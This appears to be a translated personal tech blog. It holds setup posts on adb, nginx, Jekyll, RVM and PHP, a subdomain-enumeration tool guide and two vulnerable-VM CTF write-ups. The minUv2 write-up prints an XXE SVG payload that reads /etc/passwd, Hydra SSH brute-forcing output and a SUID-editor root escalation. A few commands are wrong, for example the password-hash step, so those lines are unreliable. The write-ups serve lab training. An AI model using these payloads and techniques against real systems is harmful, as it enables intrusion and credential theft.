E/WifiStateMachine(  509): WifiStateMachine CMD_START_SCAN source -2 txSuccessRate=-0.00 rxSuccessRate=-0.00 targetRoamBSSID=any RSSI=-55
E/WifiStateMachine(  509): WifiStateMachine CMD_START_SCAN source -2 txSuccessRate=-0.00 rxSuccessRate=-0.00 targetRoamBSSID=any RSSI=-55
E/WifiStateMachine(  509): WifiStateMachine shouldSwitchNetwork  txSuccessRate=-0.00 rxSuccessRate=-0.00 delta 999 -> 999
E/WifiStateMachine(  509): CMD_AUTO_ROAM sup state CompletedState my state ConnectedState nid=0 config "lgrut25642"NONE roam=1 to any targetRoamBSSID any
E/WifiStateMachine(  509): AUTO_ROAM nothing to do
E/WifiStateMachine(  509): WifiStateMachine CMD_START_SCAN source -2 txSuccessRate=-0.00 rxSuccessRate=-0.00 targetRoamBSSID=any RSSI=-55
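A small parser for the brief logcat format shown above, added here as an example (it is not part of adb): it turns the lines into records and filters them by tag and minimum priority, which is what logcat's own filterspec `WifiStateMachine:E *:S` does on the command line. The log text is a constructed sample.

```python
import re
from collections import Counter, namedtuple

# Constructed sample in the "brief" format shown above (not a real capture).
SAMPLE_LOG = """--------- beginning of main
I/Netd    (    0): Netd 1.0 starting
E/Netd    (    0): Failed to open /proc/sys/net/ipv6/conf/lo/accept_ra_rt_table: No such file or directory
I/installd(    0): installd firing up
I/        (    0): debuggerd: Apr  4 2019 17:10:30
E/WifiStateMachine(  509): AUTO_ROAM nothing to do
W/WifiStateMachine(  509): CMD_START_SCAN source -2 RSSI=-55
D/MyApp   ( 4321): token=REDACTED
"""

# Priority letters in ascending order of severity (A = assert).
PRIORITIES = "VDIWEFA"

# "PRIO/TAG(  PID): message"; the tag may be empty and padded with spaces.
LINE_RE = re.compile(
    r"^(?P<prio>[VDIWEFA])/(?P<tag>[^(]*)\(\s*(?P<pid>\d+)\):\s?(?P<msg>.*)$"
)

LogEntry = namedtuple("LogEntry", "prio tag pid msg")


def parse_logcat(text):
    """Parse brief-format logcat output; separator lines are skipped."""
    entries = []
    for line in text.splitlines():
        match = LINE_RE.match(line)
        if match:
            entries.append(LogEntry(match["prio"], match["tag"].strip(),
                                    int(match["pid"]), match["msg"]))
    return entries


def filter_log(entries, tag=None, min_prio="V"):
    """Keep entries for one tag (or all tags) at or above a priority."""
    floor = PRIORITIES.index(min_prio)
    return [e for e in entries
            if (tag is None or e.tag == tag) and PRIORITIES.index(e.prio) >= floor]


def errors_by_tag(entries):
    """Count error-or-worse lines per tag; a quick triage view of a noisy log."""
    return Counter(e.tag for e in entries if e.prio in "EFA")


if __name__ == "__main__":
    log = parse_logcat(SAMPLE_LOG)
    for entry in filter_log(log, tag="WifiStateMachine", min_prio="E"):
        print(entry)
    print(errors_by_tag(log))
```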

6. adb install

[-lrtsd]

Install 1.apk (run on the PC side, with 1.apk given as an absolute path)
$ adb install 1.apk
3480 KB/s (54687952 bytes in 15.344s)
        pkg: /data/local/tmp/1.apk
Success

7. adb uninstall

[-k] - remove this app package from the device ('-k' means keep the data and cache directories)

$ adb uninstall [-k] com.com.pack
  	Success
  	The -k parameter keeps the app's data and cache.

8. adb help

- show this help message

9. adb version

- show version number

---------- divider ----------


That's the record.


nginx and jekyll

Nov 22, 2019. | By: Bin4xin

  • Abstract: WEBrick really is a pain. nginx is the way to go~

Using nginx to serve a jekyll blog from a container:

1. How jekyll works

First, from a user's perspective, how I understand jekyll's operation:
1. write a markdown document -> 2. markdown gets parsed -> 3. jekyll runs and generates the site files

So we simply find the site folder and copy it into nginx's document root.

cd /your-jekyll-web/
ls                   # you will see the _site/ folder; that is the generated site
cd _site/
vi 2019-01-01-your-article-title.markdown
cp _site/ /var/www/html/ -r
nginx -t
nginx: the configuration file /etc/nginx/nginx.conf syntax is ok
nginx: configuration file /etc/nginx/nginx.conf test is successful
systemctl start nginx
curl localhost

nginx tests fine, so start it directly. Then check the local page; if it shows up, the local test is done.

2. Configure the nginx server block

cat /etc/nginx/nginx.conf
The middle part is omitted; look at the server block directly
server {
        listen       80;
        server_name  ip;     # change this: if you have a public IP, set it to the public IP.
        #charset koi8-r;
        #access_log  logs/host.access.log  main;

        root   /home/www/_site/;

        location / {
            #try_files $uri $uri/ /index.php$is_args$args;
            index  index.html index.htm;
        }

        location ~ \.php {          # handles PHP pages; comment this block out if you don't need it.
            index  index.php index.html;
            include /etc/nginx/snippets/fastcgi-php.conf;
            # must point at the php-fpm socket, not the init script
            fastcgi_pass unix:/run/php/php7.3-fpm.sock;
        }

        # deny access to .htaccess files, if Apache's document root
        # concurs with nginx's one
        #
        location ~ /\.ht {
            deny all;
        }
        #error_page  404              /404.html;

        # redirect server error pages to the static page /50x.html
        #
        error_page   500 502 503 504  /50x.html;
        #location = /50x.html {
        #    root   /usr/share/nginx/html;
        #}
}

Test it the same way; if there are no errors, you are done. Now check whether the public address is reachable; if it is, there is nothing more to do. To maintain the blog, post markdown files to the server and let jekyll render them.

I hope you try it yourselves. Mwah


T-Pot honeypot deployment notes in a Docker environment

Nov 21, 2019. | By: Bin4xin

  • Abstract: Surfing the web recently I came across an open-source honeypot project; it is web-based and the web UI is really nice. On a whim, since I happen to have a public IP and have been worrying about a data source for my thesis, I decided to try it.
    • Conclusion first: the install failed. This post will be updated~ (grin)
    • According to posts introducing the project, the latest T-Pot 18 is deployed on Ubuntu Server 18.04 LTS. So try it with Docker~

1. Installing and using Docker

1.1 Install with apt-get

Install the necessary system tools

sudo apt-get update
sudo apt-get -y install apt-transport-https ca-certificates curl software-properties-common

Install the GPG key

curl -fsSL http://mirrors.aliyun.com/docker-ce/linux/ubuntu/gpg | sudo apt-key add -
Write the repository information
sudo add-apt-repository "deb [arch=amd64] http://mirrors.aliyun.com/docker-ce/linux/ubuntu $(lsb_release -cs) stable"

Update and install Docker CE

sudo apt-get -y update
sudo apt-get -y install docker-ce

2. Docker command syntax

# list the images available in the current environment
docker images 
# run the ubuntu image with host port 80 mapped, using bash as the entry point
docker run -it -p 80:80 ubuntu /bin/bash
# save command: docker does not persist changes made inside a container, so save manually
docker commit -a "runoob.com" -m "my apache" a404c6c174a2  mymysql:v1
# run the saved image
docker run -it -p 80:80 mymysql:v1 

3. netselect-apt error inside Docker

3.1 Install the netselect package that netselect-apt depends on

netselect-apt cannot be installed before netselect; it errors. netselect is a hard dependency

Install netselect_0.3.ds1-28+b1_amd64.deb
wget http://ftp.cn.debian.org/debian/pool/main/n/netselect/netselect_0.3.ds1-28+b1_amd64.deb
dpkg -i netselect_0.3.ds1-28+b1_amd64.deb

3.2 Errors installing the netselect package

These two are the dependencies that came up during this noob's install in Docker; posted here. Basically, install whatever is missing.

Fix "Can't locate Term/ReadLine.pm"
Install: apt install libterm-readkey-perl -y
Fix "No usable dialog-like program is installed"
Install: apt install dialog

3.3 Install the netselect-apt package

wget http://ftp.cn.debian.org/debian/pool/main/n/netselect/netselect-apt_0.3.ds1-28_all.deb
dpkg -i netselect-apt_0.3.ds1-28_all.deb

If the install finishes without any error it succeeded; you can also verify by invoking the two packages.

4. Install the T-Pot honeypot

cd tpotce/iso/install
cp tpot.conf.dist tpot.conf #generate the configuration file
./install.sh --type=auto --conf=tpot.conf #automatic build and configuration, using tpot.conf

Error: Aborting: debian bionic is not supported. Looks like an OS version problem and cannot be solved. ~Spent a whole afternoon on it, headache.


  • Disclaimer: the background image is from Weibo @胡歌, will remove on request~ though Hu Ge is so cute he probably won't mind

First question: what is this thing? Put simply:
Jekyll = web server + static blog + front end UI
If you want a blog of your own but never got the hang of databases, give it a try; and if you want to learn front-end, try it too~

Before configuring, recite the relationship between these four three times, until you know it backwards, then move on:

1. Ruby is the language.
2. A gem is a packaged Ruby program, similar to the concept of a "package".
3. RubyGems is Ruby's package manager, used to manage and install gems.
4. bundle (Bundler) manages a project's gems, making sure the project's dependencies are installed correctly and the right packages are used.

1. Install RVM

gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3
curl -sSL https://get.rvm.io | bash -s stable
## if the key import above fails, it prints a suggested command; copy it. If that still fails, download from the link below.
curl -L https://raw.githubusercontent.com/wayneeseguin/rvm/master/binscripts/rvm-installer | bash -s stable
source /usr/local/rvm/scripts/rvm  ## one-off environment setup for this terminal session; if you know your way around, put it in bashrc instead

Various dependencies are installed along the way; after a while, seeing "complete" means the install succeeded.

2. Install Ruby

2.1 Switch the RVM mirror

Next, change the mirror; the overseas network really is slow, nothing to be done. Same idea as changing Linux apt sources

#echo "ruby_url=https://cache.ruby-china.org/pub/ruby" > ~/.rvm/user/db
# on this noob's machine the file is .rvmrc; write the url straight into it:
#echo "ruby_url=https://cache.ruby-china.org/pub/ruby" > /root/.rvmrc

======================== Update 2020-03-31: the mirror config file ========================
echo "ruby_url=https://cache.ruby-china.com/pub/ruby" > /usr/local/rvm/user/db
===========================================================================================

If you cannot find the file that sets the RVM mirror: if you installed as above, it is basically this file.

[root@iZ2ze9ebgot9gy5c2mi5ecZ user]# echo "ruby_url=https://cache.ruby-china.com/pub/ruby" > /usr/local/rvm/user/db
[root@iZ2ze9ebgot9gy5c2mi5ecZ user]# cat db
ruby_url=https://cache.ruby-china.com/pub/ruby

[root@iZ2ze9ebgot9gy5c2mi5ecZ user]# rvm install "ruby-2.5.7"
Searching for binary rubies, this might take some time.
No binary rubies available for: centos/7/x86_64/ruby-2.5.7.
Continuing with compilation. Please read 'rvm help mount' to get more information on binary rubies.
Checking requirements for centos.
Requirements installation successful.
Installing Ruby from source to: /usr/local/rvm/rubies/ruby-2.5.7, this may take a while depending on your cpu(s)...
ruby-2.5.7 - #downloading ruby-2.5.7, this may take a while depending on your connection...
** Resuming transfer from byte position 323584
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 12.8M  100 12.8M    0     0  6097k      0  0:00:02  0:00:02 --:--:-- 6095k
ruby-2.5.7 - #extracting ruby-2.5.7 to /usr/local/rvm/src/ruby-2.5.7.....
ruby-2.5.7 - #configuring...................................................................
ruby-2.5.7 - #post-configuration..
ruby-2.5.7 - #compiling..................................................................................
ruby-2.5.7 - #installing..............................
ruby-2.5.7 - #making binaries executable..
ruby-2.5.7 - #downloading rubygems-3.0.8
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
 25  867k   25  223k    0     0  15138      0  0:00:58  0:00:15  0:00:43 16300

ruby-2.5.7 - #adjusting #shebangs for (gem irb erb ri rdoc testrb rake).
Install of ruby-2.5.7 - #complete
Ruby was built without documentation, to build it run: rvm docs generate-ri

Once you see "complete" above, the install is done

# install ruby
rvm list known             # list the ruby versions rvm knows about
rvm install "ruby-2.5.5"   # install ruby
rvm use 2.5.5              # select the ruby version to use

3. Configure the ruby-gems environment

# check before configuring:
rvm -v
rvm 1.29.9 (latest) by Michal Papis, Piotr Kuczynski, Wayne E. Seguin [https://rvm.io]
gem -v
3.0.6
ruby -v
ruby 2.5.5p157 (2019-03-15 revision 67260) [x86_64-linux]
gem sources -l
gem sources --remove https://rubygems.org/
gem sources -a https://gems.ruby-china.com  ## change the mirror (important, three times over)
gem update --system
gem install bundler

4. Install jekyll

gem install jekyll installs the jekyll tool so that jekyll runs smoothly. The tools needed differ with the template you download; the basics are listed here, and later check your template's environment requirements and install what it asks for.

gem install bundler      # packaging tool
gem install jekyll-paginate # pagination plugin; important, must be installed
gem install minima      # default theme
gem install jekyll-feed # feed plugin

bundle?

% sudo bundle exec rake production:export
/System/Library/Frameworks/Ruby.framework/Versions/2.6/usr/lib/ruby/2.6.0/universal-darwin19/rbconfig.rb:229: warning: Insecure world writable dir /usr/local/sbin in PATH, mode 040777
fatal: 不是一个 git 仓库(或者任何父目录):.git
Could not find rake-10.5.0 in any of the sources
Run `bundle install` to install missing gems.

Go to your blog directory and run git init

bin4xin@bin4xin's MacbookPro text-theme % pwd
/Users/bin4xin/blog/text-theme
bin4xin@bin4xin's MacbookPro text-theme % git init
已初始化空的 Git 仓库于 /Users/bin4xin/blog/text-theme/.git/
% bundle config mirror.https://rubygems.org https://gems.ruby-china.com
/System/Library/Frameworks/Ruby.framework/Versions/2.6/usr/lib/ruby/2.6.0/universal-darwin19/rbconfig.rb:229: warning: Insecure world writable dir /usr/local/sbin in PATH, mode 040777
bin4xin@bin4xin's MacbookPro text-theme % sudo bundle install                                                  
/System/Library/Frameworks/Ruby.framework/Versions/2.6/usr/lib/ruby/2.6.0/universal-darwin19/rbconfig.rb:229: warning: Insecure world writable dir /usr/local/sbin in PATH, mode 040777
Don't run Bundler as root. Bundler can ask for sudo if it is needed, and installing your bundle as root will break this application for all
non-root users on this machine.
Fetching gem metadata from https://gems.ruby-china.com/...........
Fetching rake 10.5.0
Installing rake 10.5.0
Fetching concurrent-ruby 1.1.5
Installing concurrent-ruby 1.1.5
Fetching i18n 1.7.0
Installing i18n 1.7.0
·· (omitted)
··
··
Fetching sassc 2.2.1
Installing sassc 2.2.1 with native extensions

Bundle complete! 3 Gemfile dependencies, 42 gems now installed.

5. Start the service

Usually you have just downloaded a template; unzip it and enter the folder. My template folder is called blog, for example

unzip blog.zip
cd blog/
git init #if you have several templates, run this first so the current folder is treated as the root; likewise, the first step with any other template is this command
jekyll serve -P 80   #build and run the jekyll service

6. jekyll errors

Could not find gem 'X' in any of the gem sources listed in your Gemfile.(Bundler::GemNotFound)
gem install X
Just install it
  • 1. jekyll-paginate fails even when it is installed.
    • gem list --local | grep jekyll-paginate #check the locally installed gems. Once it is confirmed installed, edit the Gemfile in the blog root and add: gem 'jekyll-paginate', group: :jekyll_plugins
  • 2. cannot load such file -- kramdown-parser-gfm (LoadError)
    • Just install it: install kramdown-parser-gfm; do not install the pieces one by one.

Once jekyll is running, the web service is WEBrick, which has the following things that bother me:
1) directory listing
2) no way to hide the server version (maybe it is possible but I didn't find it), so I tried nginx and found it works as well

Link

That's all.


  • Notice: this article was first published on the Huawei Cloud Kunpeng community and mirrored on the author's personal blog :)

Kunpeng cloud server, Ubuntu 18.04 64bit with ARM

PHP + NGINX symlink demonstration

Abstract: The Huawei Cloud community has lots of events~ I recently got an ARM cloud server and planned to use it to host a cloud-storage container so I can upload my thesis conveniently. Said and done: found an open-source project online, downloaded the zip, and then discovered there was no PHP environment and I had to configure it myself. Fine, I'll configure it myself.


1. Install the nginx web server

1.1 Change the apt source

Before installing the web server, remember to change the source first; I tested Ubuntu's official source and it really is a bit slow. Note that the source has to be the ARM version. This is the source this noob switched to, for reference.

## ubuntu-ports carries the arm64 packages
# remember to change the source~
vi /etc/apt/sources.list
deb http://mirrors.tuna.tsinghua.edu.cn/ubuntu-ports/ xenial main multiverse restricted universe
deb http://mirrors.tuna.tsinghua.edu.cn/ubuntu-ports/ xenial-security main multiverse restricted universe
deb http://mirrors.tuna.tsinghua.edu.cn/ubuntu-ports/ xenial-updates main multiverse restricted universe
deb http://mirrors.tuna.tsinghua.edu.cn/ubuntu-ports/ xenial-backports main multiverse restricted universe
deb-src http://mirrors.tuna.tsinghua.edu.cn/ubuntu-ports/ xenial main multiverse restricted universe
deb-src http://mirrors.tuna.tsinghua.edu.cn/ubuntu-ports/ xenial-security main multiverse restricted universe
deb-src http://mirrors.tuna.tsinghua.edu.cn/ubuntu-ports/ xenial-updates main multiverse restricted universe
deb-src http://mirrors.tuna.tsinghua.edu.cn/ubuntu-ports/ xenial-backports main multiverse restricted universe
sudo apt update
# wait for apt to finish updating; once the package list is refreshed, tab completion works~

1.2 Install

sudo apt install nginx
ps -ef | grep nginx   # check the process
curl localhost        # local test; the welcome page means the local test succeeded


To reach it over the public internet, open port 80 in the inbound security rules: console -> inbound rules -> add rule


Then visit the public IP.

2. Install PHP and configure nginx to handle it

2.1 Install PHP

sudo apt install php-fpm  ## check the php-fpm version here; the symlink configuration later fails if the versions do not match
# cd /var/run/php/
# ls
php7.0-fpm.pid  php7.0-fpm.sock  ## as you can see, this noob's version is 7.0

2.2 The most important part: the symlink-based nginx configuration

Go to /etc/nginx/sites-available and create a new file, webserver, holding the PHP handling configuration.

2.3 Configure the basic service in the server block

server {
        listen 80;            ## port the site listens on; 80 here, the browser's default HTTP port.
        root /var/www/html;   ## site root directory
        index index.php index.html index.htm index.nginx-debian.html;  ## default pages
        server_name ip;       ## your public IP

        location / {
                try_files $uri $uri/ =404;                                                    
        }

        location ~ \.php$ {         ## if the URL ends in .php, hand it to php-fpm for processing.
                include snippets/fastcgi-php.conf;
                fastcgi_pass unix:/var/run/php/php7.0-fpm.sock;  ## note the socket path must match your php-fpm version
        }

        location ~ /\.ht {
                deny all;               ## this block denies access to .htaccess files.
        }
}

2.4 Configure the nginx symlink

If it errors that webserver cannot be found (this differs per person; if you did not rename it, it is default), go to /etc/nginx/sites-enabled, check the symlinks, remove the extra ones and keep the default and webserver symlinks

sudo ln -s /etc/nginx/sites-available/webserver /etc/nginx/sites-enabled/ 
sudo nginx -t                  # nginx config test; if there is no error, go to the next step
sudo systemctl reload nginx    # reload the service to pick up the latest configuration

Fixing the error:

/etc/nginx/sites-enabled# ll
total 8
drwxr-xr-x 2 root root 4096 Nov 12 11:03 ./
drwxr-xr-x 6 root root 4096 Nov 12 11:34 ../
lrwxrwxrwx 1 root root   34 Nov 12 10:51 default -> /etc/nginx/sites-available/default
lrwxrwxrwx 1 root root   34 Nov 12 11:02 webserver -> /etc/nginx/sites-available/webserver
rm -rf webserver
sudo ln -s /etc/nginx/sites-available/webserver /etc/nginx/sites-enabled/ 

3. Test

Create a PHP file in the web root to test.

sudo vi test.php
<?php phpinfo(); ?>

Open in a browser: $_public-ip/test.php; the test succeeds:


4. Deploy the storage container

Don't forget our ultimate goal: deploying the cloud-storage container. Unzip the web folder into the web root and visit it. Since this is a third-party open-source project, its security cannot be guaranteed and I cannot promise there are no backdoors; if that concerns you, build your own (code-hosting platforms have such projects too). To avoid trouble I have masked all information relating to the project; sorry.


Done. A personal cloud-storage container is basically ready for use, from both phone and PC. I suggest you try it yourselves.
Mwah


Abstract: Over the summer I registered an account on the Xianzhi (云先知) platform, and when idle I play groundhog and dig for bugs. Those who have done it know: it is a centralized platform similar to pentesting. Vendor companies have a need and publish tasks through the platform, graded by vulnerability severity [Critical] - [High] - [Medium] - [Low]; critical means the server's privileges are at stake: a web shell, root, or even lateral movement; each level below is correspondingly less severe. Interested readers can search and get a feel for it (guess where XSS lands).

Against that background, each task specifies a set of in-scope domains. Other domains are not registered for testing and must not be touched. For example:

Here is the key point: the leading * is what we have to test ourselves; in other words, different values of * bring different surprises.

Which brings us to today's star: findomain, a cross-platform subdomain enumeration tool.

1. Download and install

    $ git clone https://github.com/Edu4rdSHL/findomain.git
    $ cd findomain
    $ apt-get install cargo
    $ cargo build --release
    $ sudo cp target/release/findomain  /usr/bin
    $ findomain

2. Syntax

1. Simple subdomain search, printing the results:
  findomain -t example.com

2. Search using all APIs, printing the results:
findomain -t example.com -a

3. Search subdomains and export the output in CSV format:
findomain -t example.com -o csv

4. Search using all APIs and export the output in CSV format:
findomain -t example.com -a -o csv

3. Real use

  $ findomain -t a****un.com -o csv

    Target ==> a****un.com

    Searching in the CertSpotter API...
    Searching in the Bufferover API...
    Searching in the Crtsh database...
    Searching in the Virustotal API...
    Searching in the Sublist3r API...
    Searching in the Facebook API...
    Searching in the Threadcrowd API...
    Searching in the Spyse API...
    An error ❌ has occurred while parsing the JSON obtained from the Threadcrowd API. Error description: JSON error.

    An error ❌ has occurred while parsing the JSON obtained from the Bufferover API. Error description: JSON error.

    An error ❌ has occurred while parsing the JSON obtained from the Sublist3r API. Error description: JSON error.

    A timeout ⏳ error has occurred while processing the request in the Facebook API. Error description: timed out


    A total of `153` subdomains were found for ==>  a***un.com

    Good luck Hax0r !

    >>  Filename for the target aliyun.com was saved in: ./a*****n.com_1680.csv

As you can see: A total of 153 subdomains. So findomain collected 153 subdomains in all. Finally, good luck. The CSV output is written to the directory the tool was run from. Recommended for information gathering; it works well, mwah


[Pentesting] The mysterious power of SVG: minUv2

Sep 1, 2019. | By: Bin4xin

Preface

Hello all. Having nothing to do lately, I secretly used the company computer after work to test-attack a Linux target VM, so here is a record (doge). The box is of moderate difficulty; it reproduces an SVG code-execution vulnerability and requires familiarity with Linux commands. SVG, broadly, is an XML-based image file format developed by the W3C; it opens in browsers and is easy to edit. Look it up yourself for the details~ Go easy on me, experts.

I. About the target

minUv2 download:
Download (Mirror)
Download (Torrent)

II. Hands on

Standard procedure, tools first: use Nmap to locate the target and find its IP. This box only supports VirtualBox, so it needs a bridged network; forgive the redaction~

With the IP, straight to a port scan~ Only two ports are open: 22 and 3306. Leave 22 aside for now and look at 3306. It is a web page, emmmm. Enter the protagonist: the SVG image~

III. Finding the vulnerability

A quick dirb scan, and sure enough there was a find.

# scan port 3306 for files with the .html suffix
dirb http://$_ip:port -X .html
--------------
+ http://$_ip:port/upload.html (CODE:200|SIZE:908)
--------------
DOWNLOADED: 4612 - FOUND: 1

Found an upload page that only accepts svg and img files, a pleasant surprise. A search for exploits turned up a PoC; verify that the vulnerability exists. PoC code:

<!-- PoC: after uploading, the page echoes the result -->
<!DOCTYPE svg [
<!ELEMENT svg ANY >
<!ENTITY xxe SYSTEM "/etc/passwd">
]>
<svg version="1.0" xmlns="http://www.w3.org/2000/svg" width="19000px" xmlns:xlink="http://www.w3.org/1999/xlink" >
<text x="-1000" y="-1000" >&xxe;</text>
<circle cx="50" cy="50" r="40" stroke="black" stroke-width="3" fill="red" />
<script>
var logger = "http://localhost/?file=" +
encodeURIComponent(document.getElementsByTagName("text")[0].innerHTML);
document.createElementNS('http://www.w3.org/2000/svg','image').setAttributeNS('http://www.w3.org/1999/xlink','href', logger);
</script></svg>


Sure enough, there is an XXE vulnerability. But confirming it does not give us real progress: we can only read the contents of some files, not get a shell. What to do?
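From the defender's side, the upload handler on a box like this should reject an SVG before it reaches an XML parser that resolves entities. The validator below is an added example (not the target's code and not the PoC); it uses Python's expat bindings to flag a DOCTYPE, entity declarations with an external identifier, external entity references, and script elements or on* event-handler attributes. The two SVGs are constructed samples modelled on the PoC above.

```python
"""Reject SVG uploads that carry XXE or script payloads (added example)."""
import xml.parsers.expat

# Constructed sample modelled on the PoC above (not a live upload).
XXE_SVG = b"""<?xml version="1.0"?>
<!DOCTYPE svg [
<!ELEMENT svg ANY >
<!ENTITY xxe SYSTEM "/etc/passwd">
]>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<text x="-1000" y="-1000">&xxe;</text>
<script>var logger = "http://localhost/?file=";</script>
</svg>"""

# Constructed benign sample: just the circle, no DTD, no script.
CLEAN_SVG = b"""<?xml version="1.0"?>
<svg xmlns="http://www.w3.org/2000/svg" width="100" height="100">
<circle cx="50" cy="50" r="40" stroke="black" stroke-width="3" fill="red"/>
</svg>"""


def svg_findings(data):
    """Return the reasons an SVG upload should be rejected (empty list = accept).

    The parser only *reports* entities; it never resolves them, so /etc/passwd
    is not read even while the PoC is being inspected.
    """
    findings = []
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        # Strict policy: an uploaded image never needs a DTD at all.
        findings.append("doctype")

    def on_entity_decl(name, is_param, value, base, sysid, pubid, notation):
        if sysid is not None or pubid is not None:
            findings.append("external-entity-decl:%s" % name)

    def on_external_ref(context, base, sysid, pubid):
        findings.append("external-entity-ref:%s" % sysid)
        return 1  # tell expat to skip the entity and keep parsing

    def on_start(name, attrs):
        local = name.rsplit(":", 1)[-1].lower()
        if local == "script":
            findings.append("script-element")
        for attr, value in attrs.items():
            attr_local = attr.rsplit(":", 1)[-1].lower()
            if attr_local.startswith("on"):
                findings.append("event-handler:%s" % attr)
            elif attr_local == "href" and value.strip().lower().startswith("javascript:"):
                findings.append("javascript-href")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref
    parser.StartElementHandler = on_start
    try:
        parser.Parse(data, True)
    except xml.parsers.expat.ExpatError as err:
        findings.append("malformed:%s" % err)
    return findings


if __name__ == "__main__":
    print("PoC  ->", svg_findings(XXE_SVG))
    print("clean->", svg_findings(CLEAN_SVG))
```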

IV. Getting a shell

Just as this rookie was scowling, I noticed that the last user's shell in passwd is /bin/ash. Remembering that a bash-style shell keeps a history, I quickly uploaded a new PoC to test the idea. The echoed content:

"./ash.history" retrieved~
Useradd D bossdonttrackme p superultrapass3

From this, build a username list (the usernames echoed from passwd) and a password list, and run Hydra against them.

## hydra -L /root/Documents/test/minu/use.txt -P /root/Documents/test/minu/passwd.txt ssh://$_ip
Hydra v8.9.1 (c) 2019 by van Hauser/THC - Please do not use in military or 
secret service organizations, or for illegal purposes.
[WARNING] Many SSH configurations limit the number of parallel tasks, it is
recommended to reduce the tasks: use -t 4	[DATA] max 16 tasks per 1 server, overall 16 tasks, 30 login tries (l:30/p:1), ~2 tries per task
[DATA] attacking ssh://$_ip:22/
[22][ssh] host: $_ip ** login: employee password: superultrapass3**
1 of 1 target successfully completed, 1 valid password found
## credentials found: employee:superultrapass3; connect with ssh.
## once connected, check the basic information
ssh employee@ip
whoami
id | find -perm -4000 2>/dev/null

V. Privilege escalation

micro has the SUID bit set, so no elevated privilege is needed to run it; running it shows that micro is a text editor. The rest is simple.

# generate a password hash and replace the user's password field in passwd, so the password becomes known.
# open the passwd file with the micro editor, replace the root password and save
passwd -1 -salty root admin123   # (any password)
cat /etc/passwd |/usr/bin/micro

Now the root password is known; switch user directly

minuv2:~$ su root
Password: 
minuv2:/home/employee# whoami
root
minuv2:/home/employee#

Got the flag~ Thanks, everyone


Preface

Hello, everyone. I recently squeezed out two days to test-attack a Linux target VM and am writing it up. I think this box suits white hats who have just started and have some basics (yes, you!): most of the flags are obtained with tools. Experts, have a laugh (doge). The whole write-up follows this rookie's train of thought, so just follow along; it will be a bit messy. Forgive me.

I. The target

The target is from vulnhub; download links:

PumpkinRaising:
Download (Mirror): https://download.vulnhub.com/missionpumpkin/PumpkinRaising.ova
Download (Torrent): https://download.vulnhub.com/missionpumpkin/PumpkinRaising.ova.torrent

II. Hands on

2.1 Port scan

Standard procedure, tools first: use Nmap to locate the target and find its IP.

Scan it (-O -A, doge):

Nothing unusual is open; the standard 22 and 80. The scan also turned up robots.txt under port 80. A jolt: this many? Pleased, I opened them one by one; no rush, this time it's in the bag (doge). Leaving port 22 alone for now, I saw how much the robots file listed and opened it like a treasure: oh my, directories, image files, paths. First check the files for clues.

2.2 Port reconnaissance: following the thread

After trying them, only the following were accessible: 1) underconstruction.html: (an "under construction" page) hints that there is something fishy about the image. Download uc.gif and try it.
I happen to be studying image steganography, so I threw it into Stegsolve. Like an ordinary image, Alpha planes 1-7 were all blank; after flipping back and forth, Red planes 6 and 7 looked a bit odd, but extracting the data and viewing it yielded nothing (forgive me, I'm a noob); tried various RGB combinations and low bits, and tried extracting a bin; none produced anything useful.
Then it occurred to me: this is a gif, could there be an offset? Tried Stereogram Solver; as expected that also failed, and a lot of time was wasted on this image.
Since nothing useful turned up, set this image aside for now. No rush; keep going through the contents of the robots file.

2) the note text in the hidden directory: the note file under hidden shows text that looks like credentials. Could it be the SSH login? It can't be that simple, right? Mouth saying no, the body honestly tried it anyway: no. But so far we haven't found anything like a login page, so set this aside too.

3) /seeds/seed.txt.gpg downloads directly when visited. gpg? It opened as garbage; a quick search turned up a few tools, and I used gpg on Kali (if you haven't used it, search for a tutorial; it is a few hundred KB)

After some fumbling I found a clue
It looked like Morse code; decoded in a Morse tool, and just like that this rookie got the first flag (id): 69507

2.3 Back to business: port 80

Let's see what's on the home page. A static page on port 80~ Viewing the source gave two useful pieces of information: a string that looks like base64, decoded with nothing useful: This is just to remaind you that it's Level 2 of Mission-Pumpkin! ;) Next, a URL pointing to pumpkin.html; another commented-out ciphertext string; base64 fails, try base32.
It decodes to /scripts/spy.pacp; visiting it downloads a packet capture. Opened in wireshark, clicked a random packet with PSH set
and found plaintext; followed the TCP stream without hesitation and found ID: 50609 ~ lucky, not bad
Key point: don't forget the slider on the right of pumpkin.html; scrolling to the bottom reveals a commented-out hex array; decoded with an online tool, it yields Seeds ID: 96454 (my habits are poor, I don't like F12, so I noticed this very late, quietly)
Finally, effort paid off: three ids solved; the author's download page says there are four in total. To sum up: one more gif image hides an id; decode it, add the three already found, and it's done. (So confident?) Since Stegsolve didn't work, switch tools: stegosuite, which asked for a password. Recalling the odd strings in the hidden directory, I copied them and tried them one by one: still no, wrong password. Ugh~ the wrong image? Sure enough, after this rookie's persistent effort, the catch was found. The catch was not in the steganography within the image but in which image... In the end the stego image was jackolatantern.gif. (I have complained about the author ten thousand times)
Extracting the text gives id: 86568

2.4 All ids in hand, let's go

So, four seed ids in total: 69507 96454 50609 86568. Staring at the four ids, I guessed the username jack and fell into deep thought: run msf, or Hydra~ yes, this rookie really is that indecisive (the script uses Python built-ins; attached at the end)

III. Combination: ssh, privilege escalation

In the end I used my favorite msf to crack the password (first use the script to combine the four ids in different orders), and it came out as in the screenshot. Next, ssh in.
ssh -l jack pass
Continuing smoothly, sudo su. No? In the end the reference mentions permissions. Skipping the exploit-based privilege escalation~

IV. Summary

Overall, although the intrusion process was a bit winding and this rookie was misled into quite a few pits, it was not very hard; there was no need to find page vulnerabilities and pop a webshell, so I think it suits players with some pentesting basics~ (yes, that's me).

References

https://www.360zhijia.com/anquan/413205.html Random combination script:

# the four seed ids from above; mind Python's strict indentation~
import itertools
a, b, c, d = "69507", "96454", "50609", "86568"
for i in itertools.permutations([a, b, c, d], 4):
    print(i)

Have fun, guys. Why not do it yourself?


This site is supported by Sentinel Security Lab (哨兵安全实验室)

Personal thanks to the @TUNA association for the open-source code

Powered by Bin4xin & this open-source code repository.

